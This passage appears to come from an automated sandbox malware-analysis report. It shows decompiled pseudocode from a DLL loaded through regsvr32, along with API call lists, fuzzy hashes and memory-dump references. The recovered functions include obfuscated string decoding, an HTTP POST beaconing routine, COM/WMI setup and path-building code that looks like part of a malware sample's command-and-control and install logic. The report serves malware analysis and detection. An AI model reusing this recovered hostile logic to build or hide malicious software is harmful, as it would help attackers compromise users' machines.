        										_t329 = _t329 + 0x18;
        										_t298 =  &_v616;
        										L31:
        										_t242 = E100091E3(_t298);
        										L32:
        										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
        										goto L38;
        									}
        									_t242 = E1000DA20( &_v80);
        									goto L32;
        								}
        								if(__eflags == 0) {
        									__eflags = _v72 - 0xffff;
        									_t298 = L"TRUE";
        									if(_v72 != 0xffff) {
        										_t298 = L"FALSE";
        									}
        									goto L31;
        								}
        								_t243 = _t218 - 1;
        								__eflags = _t243;
        								if(_t243 == 0) {
        									goto L38;
        								}
        								_t244 = _t243 - 1;
        								__eflags = _t244;
        								if(_t244 == 0) {
        									goto L35;
        								}
        								_t245 = _t244 - 1;
        								__eflags = _t245;
        								if(_t245 == 0) {
        									goto L35;
        								}
        								__eflags = _t245 != 5;
        								if(_t245 != 5) {
        									goto L28;
        								}
        								_t298 = _v72;
        								goto L31;
        							}
        							__imp__#16(_v24);
        							_t210 = _v28;
        							 *((intOrPtr*)( *_t210 + 8))(_t210);
        							_t252 = _v20;
        							L42:
        							_t262 = _v32;
        							_t252 = _t252 + 1;
        							_v20 = _t252;
        							__eflags = _t262;
        							if(_t262 != 0) {
        								continue;
        							}
        							L48:
        							_t324 = _v40;
        							goto L49;
        						}
        						_t247 = _v28;
        						 *((intOrPtr*)( *_t247 + 8))(_t247);
        						goto L42;
        					}
        					_t262 = _v32;
        					goto L48;
        				} else {
        					E1000861A( &_v36, _t322);
        					_t320 = _v36;
        					goto L53;
        				}
        			}

        APIs
          • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
          • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
          • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
          • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
          • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
        • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
        • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
        • SysFreeString.OLEAUT32(?), ref: 1000DF82
        • SysFreeString.OLEAUT32(?), ref: 1000DF8B
          • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
        • String ID: FALSE$TRUE
        • API String ID: 224402418-1412513891
        • Opcode ID: 5d92cc2ce36c8b73f617da86ff32e213aea554078eedf743720070c244731c5e
        • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
        • Opcode Fuzzy Hash: 5d92cc2ce36c8b73f617da86ff32e213aea554078eedf743720070c244731c5e
        • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
        				char _v8;
        				char _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				intOrPtr _v28;
        				char _v32;
        				intOrPtr _v36;
        				signed int _v40;
        				signed int _v44;
        				intOrPtr _v48;
        				intOrPtr _v52;
        				intOrPtr _v56;
        				intOrPtr _v60;
        				char _v64;
        				int _v76;
        				void* _v80;
        				intOrPtr _v100;
        				int _v104;
        				void* _v108;
        				intOrPtr _v112;
        				intOrPtr _v116;
        				char* _v120;
        				void _v124;
        				char _v140;
        				void _v396;
        				void _v652;
        				intOrPtr _t105;
        				intOrPtr _t113;
        				intOrPtr* _t115;
        				intOrPtr _t118;
        				intOrPtr _t121;
        				intOrPtr _t124;
        				intOrPtr _t127;
        				intOrPtr _t131;
        				char _t133;
        				intOrPtr _t136;
        				char _t138;
        				char _t139;
        				intOrPtr _t141;
        				intOrPtr _t147;
        				intOrPtr _t154;
        				intOrPtr _t158;
        				intOrPtr _t162;
        				intOrPtr _t164;
        				intOrPtr _t166;
        				intOrPtr _t172;
        				intOrPtr _t176;
        				void* _t183;
        				void* _t185;
        				intOrPtr _t186;
        				char _t195;
        				intOrPtr _t203;
        				intOrPtr _t204;
        				signed int _t209;
        				void _t212;
        				intOrPtr _t213;
        				void* _t214;
        				intOrPtr _t216;
        				char _t217;
        				intOrPtr _t218;
        				signed int _t219;
        				signed int _t220;
        				void* _t221;
        
        				_v40 = _v40 & 0x00000000;
        				_v24 = 4;
        				_v36 = 1;
        				_t214 = __edx;
        				memset( &_v396, 0, 0x100);
        				memset( &_v652, 0, 0x100);
        				_v64 = E100095C7(0x85b);
        				_v60 = E100095C7(0xdc9);
        				_v56 = E100095C7(0x65d);
        				_v52 = E100095C7(0xdd3);
        				_t105 = E100095C7(0xb74);
        				_v44 = _v44 & 0;
        				_t212 = 0x3c;
        				_v48 = _t105;
        				memset( &_v124, 0, 0x100);
        				_v116 = 0x10;
        				_v120 =  &_v140;
        				_v124 = _t212;
        				_v108 =  &_v396;
        				_v104 = 0x100;
        				_v80 =  &_v652;
        				_push( &_v124);
        				_push(0);
        				_v76 = 0x100;
        				_push(E1000C379(_t214));
        				_t113 =  *0x1001e6a4; // 0x0
        				_push(_t214);
        				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
        					_t209 = 0;
        					_v20 = 0;
        					do {
        						_t115 =  *0x1001e6a4; // 0x0
        						_v12 = 0x8404f700;
        						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
        						if(_t213 != 0) {
        							_t195 = 3;
        							_t185 = 4;
        							_v8 = _t195;
        							_t118 =  *0x1001e6a4; // 0x0
        							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
        							_v8 = 0x3a98;
        							_t121 =  *0x1001e6a4; // 0x0
        							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
        							_v8 = 0x493e0;
        							_t124 =  *0x1001e6a4; // 0x0
        							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
        							_v8 = 0x493e0;
        							_t127 =  *0x1001e6a4; // 0x0
        							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
        							_t131 =  *0x1001e6a4; // 0x0
        							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
        							if(_a24 != 0) {
        								E1000980C(_a24);
        							}
        							if(_t186 != 0) {
        								_t133 = 0x8484f700;
        								if(_v112 != 4) {
        									_t133 = _v12;
        								}
        								_t136 =  *0x1001e6a4; // 0x0
        								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
        								_v8 = _t216;
        								if(_a24 != 0) {
        									E1000980C(_a24);
        								}
        								if(_t216 != 0) {
        									_t138 = 4;
        									if(_v112 != _t138) {
        										L19:
        										_t139 = E100095C7(0x777);
        										_t217 = _t139;
        										_v12 = _t217;
        										_t141 =  *0x1001e6a4; // 0x0
        										_t218 = _v8;
        										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
        										E100085C2( &_v12);
        										if(_a24 != 0) {
        											E1000980C(_a24);
        										}
        										if(_v28 != 0) {
        											L28:
        											_v24 = 8;
        											_push(0);
        											_v32 = 0;
        											_v28 = 0;
        											_push( &_v24);
        											_push( &_v32);
        											_t147 =  *0x1001e6a4; // 0x0
        											_push(0x13);
        											_push(_t218);
        											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
        												_t219 = E10009749( &_v32);
        												if(_t219 == 0xc8) {
        													 *_a20 = _v8;
        													 *_a12 = _t213;
        													 *_a16 = _t186;
        													return 0;
        												}
        												_t220 =  ~_t219;
        												L32:
        												_t154 =  *0x1001e6a4; // 0x0
        												 *((intOrPtr*)(_t154 + 8))(_v8);
        												L33:
        												if(_t186 != 0) {
        													_t158 =  *0x1001e6a4; // 0x0
        													 *((intOrPtr*)(_t158 + 8))(_t186);
        												}
        												if(_t213 != 0) {
        													_t203 =  *0x1001e6a4; // 0x0
        													 *((intOrPtr*)(_t203 + 8))(_t213);
        												}
        												return _t220;
        											}
        											GetLastError();
        											_t220 = 0xfffffff8;
        											goto L32;
        										} else {
        											GetLastError();
        											_t162 =  *0x1001e6a4; // 0x0
        											 *((intOrPtr*)(_t162 + 8))(_t218);
        											_t218 = 0;
        											goto L23;
        										}
        									}
        									_v12 = _t138;
        									_push( &_v12);
        									_push( &_v16);
        									_t172 =  *0x1001e6a4; // 0x0
        									_push(0x1f);
        									_push(_t216);
        									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
        										L18:
        										GetLastError();
        										goto L19;
        									}
        									_v16 = _v16 | 0x00003380;
        									_push(4);
        									_push( &_v16);
        									_t176 =  *0x1001e6a4; // 0x0
        									_push(0x1f);
        									_push(_t216);
        									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
        										goto L19;
        									}
        									goto L18;
        								} else {
        									GetLastError();
        									L23:
        									_t164 =  *0x1001e6a4; // 0x0
        									 *((intOrPtr*)(_t164 + 8))(_t186);
        									_t186 = 0;
        									goto L24;
        								}
        							} else {
        								GetLastError();
        								L24:
        								_t166 =  *0x1001e6a4; // 0x0
        								 *((intOrPtr*)(_t166 + 8))(_t213);
        								_t213 = 0;
        								goto L25;
        							}
        						}
        						GetLastError();
        						L25:
        						_t204 = _t218;
        						_t209 = _v20 + 1;
        						_v20 = _t209;
        					} while (_t209 < 2);
        					_v8 = _t218;
        					if(_t204 != 0) {
        						goto L28;
        					}
        					_t220 = 0xfffffffe;
        					goto L33;
        				}
        				_t183 = 0xfffffffc;
        				return _t183;
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: memset$ErrorLast
        • String ID: POST
        • API String ID: 2570506013-1814004025
        • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
        • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
        • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
        • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 28%
        			E100116B8(signed int* _a4) {
        				char _v8;
        				_Unknown_base(*)()* _v12;
        				_Unknown_base(*)()* _v16;
        				char _v20;
        				_Unknown_base(*)()* _t16;
        				_Unknown_base(*)()* _t17;
        				void* _t22;
        				intOrPtr* _t28;
        				signed int _t29;
        				signed int _t30;
        				struct HINSTANCE__* _t32;
        				void* _t34;
        
        				_t30 = 0;
        				_v8 = 0;
        				_t32 = GetModuleHandleA("advapi32.dll");
        				if(_t32 == 0) {
        					L9:
        					return 1;
        				}
        				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
        				_v12 = _t16;
        				if(_t16 == 0) {
        					goto L9;
        				}
        				_t17 = GetProcAddress(_t32, "CryptGenRandom");
        				_v16 = _t17;
        				if(_t17 == 0) {
        					goto L9;
        				}
        				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
        				if(_t28 == 0) {
        					goto L9;
        				}
        				_push(0xf0000000);
        				_push(1);
        				_push(0);
        				_push(0);
        				_push( &_v8);
        				if(_v12() == 0) {
        					goto L9;
        				}
        				_t22 = _v16(_v8, 4,  &_v20);
        				 *_t28(_v8, 0);
        				if(_t22 == 0) {
        					goto L9;
        				}
        				_t29 = 0;
        				do {
        					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
        					_t29 = _t29 + 1;
        				} while (_t29 < 4);
        				 *_a4 = _t30;
        				return 0;
        			}
















        APIs
        • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
        • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
        • API String ID: 667068680-129414566
        • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
        • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
        • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
        • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
        				signed int _t12;
        				signed int _t13;
        				int _t15;
        				char* _t24;
        				char* _t26;
        				char* _t28;
        				char* _t29;
        				signed int _t40;
        				char* _t43;
        				char* _t45;
        				long long* _t47;
        
        				_t12 = _a20;
        				if(_t12 == 0) {
        					_t12 = 0x11;
        				}
        				_t26 = _a4;
        				_push(_t30);
        				 *_t47 = _a12;
        				_push(_t12);
        				_push("%.*g");
        				_push(_a8);
        				_push(_t26);
        				L10012285();
        				_t40 = _t12;
        				if(_t40 < 0 || _t40 >= _a8) {
        					L19:
        					_t13 = _t12 | 0xffffffff;
        					goto L20;
        				} else {
        					L100122CD();
        					_t15 =  *((intOrPtr*)( *_t12));
        					if(_t15 != 0x2e) {
        						_t24 = strchr(_t26, _t15);
        						if(_t24 != 0) {
        							 *_t24 = 0x2e;
        						}
        					}
        					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
        						L11:
        						_t43 = strchr(_t26, 0x65);
        						_t28 = _t43;
        						if(_t43 == 0) {
        							L18:
        							_t13 = _t40;
        							L20:
        							return _t13;
        						}
        						_t45 = _t43 + 1;
        						_t29 = _t28 + 2;
        						if( *_t45 == 0x2d) {
        							_t45 = _t29;
        						}
        						while( *_t29 == 0x30) {
        							_t29 = _t29 + 1;
        						}
        						if(_t29 != _t45) {
        							E10008706(_t45, _t29, _t40 - _t29 + _a4);
        							_t40 = _t40 + _t45 - _t29;
        						}
        						goto L18;
        					} else {
        						_t6 = _t40 + 3; // 0x100109b2
        						_t12 = _t6;
        						if(_t12 >= _a8) {
        							goto L19;
        						}
        						_t26[_t40] = 0x302e;
        						( &(_t26[2]))[_t40] = 0;
        						_t40 = _t40 + 2;
        						goto L11;
        					}
        				}
        			}















        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: strchr$_snprintflocaleconv
        • String ID: %.*g
        • API String ID: 1910550357-952554281
        • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
        • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
        • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
        • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: _snprintfqsort
        • String ID: %I64d$false$null$true
        • API String ID: 756996078-4285102228
        • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
        • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
        • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
        • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
        				char _v516;
        				void _v1044;
        				char _v1076;
        				signed int _v1080;
        				signed int _v1096;
        				WCHAR* _v1100;
        				intOrPtr _v1104;
        				signed int _v1108;
        				intOrPtr _v1112;
        				intOrPtr _v1116;
        				char _v1144;
        				char _v1148;
        				void* __esi;
        				intOrPtr _t66;
        				intOrPtr _t73;
        				signed int _t75;
        				intOrPtr _t76;
        				signed int _t81;
        				WCHAR* _t87;
        				void* _t89;
        				signed int _t90;
        				signed int _t91;
        				signed int _t93;
        				signed int _t94;
        				WCHAR* _t96;
        				intOrPtr _t106;
        				intOrPtr _t107;
        				void* _t108;
        				intOrPtr _t109;
        				signed char _t116;
        				WCHAR* _t118;
        				void* _t122;
        				signed int _t123;
        				intOrPtr _t125;
        				void* _t128;
        				void* _t129;
        				WCHAR* _t130;
        				void* _t134;
        				void* _t141;
        				void* _t143;
        				WCHAR* _t145;
        				signed int _t153;
        				void* _t154;
        				void* _t178;
        				signed int _t180;
        				void* _t181;
        				void* _t183;
        				void* _t187;
        				signed int _t188;
        				WCHAR* _t190;
        				signed int _t191;
        				signed int _t192;
        				intOrPtr* _t194;
        				signed int _t196;
        				void* _t199;
        				void* _t200;
        				void* _t201;
        				void* _t202;
        				intOrPtr* _t203;
        				void* _t208;
        
        				_t208 = __fp0;
        				_push(_t191);
        				_t128 = __edx;
        				_t187 = __ecx;
        				_t192 = _t191 | 0xffffffff;
        				memset( &_v1044, 0, 0x20c);
        				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
        				_v1108 = 1;
        				if(_t187 != 0) {
        					_t123 =  *0x1001e688; // 0x2120590
        					_t125 =  *0x1001e68c; // 0x219fc68
        					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
        				}
        				if(E1000BB8D(_t187) != 0) {
        					L4:
        					_t134 = _t128;
        					_t66 = E1000B7A8(_t134,  &_v516);
        					_push(_t134);
        					_v1104 = _t66;
        					E1000B67D(_t66,  &_v1076, _t206, _t208);
        					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
        					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
        					E1000B88A(_t141,  &_v1100, _t208);
        					_t175 =  &_v1076;
        					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
        					_v1112 = _t73;
        					_t143 = _t141;
        					if(_t73 != 0) {
        						_push(0);
        						_push(_t129);
        						_push("\\");
        						_t130 = E100092E5(_t73);
        						_t200 = _t199 + 0x10;
        						_t75 =  *0x1001e688; // 0x2120590
        						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
        						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
        							L12:
        							__eflags = _v1108;
        							if(__eflags != 0) {
        								_t76 = E100091E3(_v1112);
        								_t145 = _t130;
        								 *0x1001e740 = _t76;
        								 *0x1001e738 = E100091E3(_t145);
        								L17:
        								_push(_t145);
        								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
        								_t201 = _t200 + 0x10;
        								__eflags = _t188;
        								if(_t188 == 0) {
        									goto L41;
        								}
        								_push(0x1001b9ca);
        								E10009F48(0xe);
        								E10009F6C(_t188, _t208, _t130);
        								_t194 = _a4;
        								_v1096 = _v1096 & 0x00000000;
        								_push(2);
        								_v1100 =  *_t194;
        								_push(8);
        								_push( &_v1100);
        								_t178 = 0xb;
        								E1000A0AB(_t188, _t178, _t208);
        								_t179 =  *(_t194 + 0x10);
        								_t202 = _t201 + 0xc;
        								__eflags =  *(_t194 + 0x10);
        								if( *(_t194 + 0x10) != 0) {
        									E1000A3ED(_t188, _t179, _t208);
        								}
        								_t180 =  *(_t194 + 0xc);
        								__eflags = _t180;
        								if(_t180 != 0) {
        									E1000A3ED(_t188, _t180, _t208);
        								}
        								_t87 = E1000980C(0);
        								_push(2);
        								_v1100 = _t87;
        								_t153 = _t188;
        								_push(8);
        								_v1096 = _t180;
        								_push( &_v1100);
        								_t181 = 2;
        								_t89 = E1000A0AB(_t153, _t181, _t208);
        								_t203 = _t202 + 0xc;
        								__eflags = _v1108;
        								if(_v1108 == 0) {
        									_t153 =  *0x1001e688; // 0x2120590
        									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
        									if(__eflags != 0) {
        										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
        										_t203 = _t203 + 0xc;
        										goto L26;
        									}
        									_t153 = _t153 + 0x228;
        									goto L25;
        								} else {
        									_t91 =  *0x1001e688; // 0x2120590
        									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
        									if(__eflags != 0) {
        										L32:
        										__eflags =  *(_t91 + 0x1898) & 0x00000082;
        										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
        											_t183 = 0x64;
        											E1000E23E(_t183);
        										}
        										E100052C0( &_v1076, _t208);
        										_t190 = _a8;
        										_t154 = _t153;
        										__eflags = _t190;
        										if(_t190 != 0) {
        											_t94 =  *0x1001e688; // 0x2120590
        											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
        											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
        												lstrcpyW(_t190, _t130);
        											} else {
        												_t96 = E1000109A(_t154, 0x228);
        												_v1100 = _t96;
        												lstrcpyW(_t190, _t96);
        												E100085D5( &_v1100);
        												 *_t203 = "\"";
        												lstrcatW(_t190, ??);
        												lstrcatW(_t190, _t130);
        												lstrcatW(_t190, "\"");
        											}
        										}
        										_t93 = _a12;
        										__eflags = _t93;
        										if(_t93 != 0) {
        											 *_t93 = _v1104;
        										}
        										_t192 = 0;
        										__eflags = 0;
        										goto L41;
        									}
        									_t51 = _t91 + 0x228; // 0x21207b8
        									_t153 = _t51;
        									L25:
        									_t90 = E1000553F(_t153, _t130, __eflags);
        									L26:
        									__eflags = _t90;
        									if(_t90 >= 0) {
        										_t91 =  *0x1001e688; // 0x2120590
        										goto L32;
        									}
        									_push(0xfffffffd);
        									L6:
        									_pop(_t192);
        									goto L41;
        								}
        							}
        							_t106 = E1000C292(_v1104, __eflags);
        							_v1112 = _t106;
        							_t107 =  *0x1001e684; // 0x219faa0
        							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
        							__eflags = _t108 - _t192;
        							if(_t108 != _t192) {
        								_t109 =  *0x1001e684; // 0x219faa0
        								 *((intOrPtr*)(_t109 + 0x30))();
        								E1000861A( &_v1148, _t192);
        								_t145 = _t108;
        								goto L17;
        							}
        							E1000861A( &_v1144, _t192);
        							_t81 = 1;
        							goto L42;
        						}
        						_t116 =  *(_t75 + 0x1898);
        						__eflags = _t116 & 0x00000004;
        						if((_t116 & 0x00000004) == 0) {
        							__eflags = _t116;
        							if(_t116 != 0) {
        								goto L12;
        							}
        							L11:
        							E1000E286(_v1112, _t175);
        							goto L12;
        						}
        						_v1080 = _v1080 & 0x00000000;
        						_t118 = E100095E1(_t143, 0x879);
        						_v1100 = _t118;
        						_t175 = _t118;
        						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
        						E100085D5( &_v1100);
        						_t200 = _t200 + 0x14;
        						goto L11;
        					}
        					_push(0xfffffffe);
        					goto L6;
        				} else {
        					_t122 = E10002BA4( &_v1044, _t192, 0x105);
        					_t206 = _t122;
        					if(_t122 == 0) {
        						L41:
        						_t81 = _t192;
        						L42:
        						return _t81;
        					}
        					goto L4;
        				}
        			}
































































        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: lstrcat$lstrcpy$memset
        • String ID:
        • API String ID: 1985475764-0
        • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
        • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
        • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
        • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
        • SysAllocString.OLEAUT32(?), ref: 1000D764
        • SysAllocString.OLEAUT32(00000000), ref: 1000D778
        • SysFreeString.OLEAUT32(?), ref: 1000D7F3
        • SysFreeString.OLEAUT32(?), ref: 1000D7F6
        • SysFreeString.OLEAUT32(?), ref: 1000D7FB
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: String$AllocFree
        • String ID:
        • API String ID: 344208780-0
        • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
        • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
        • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
        • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
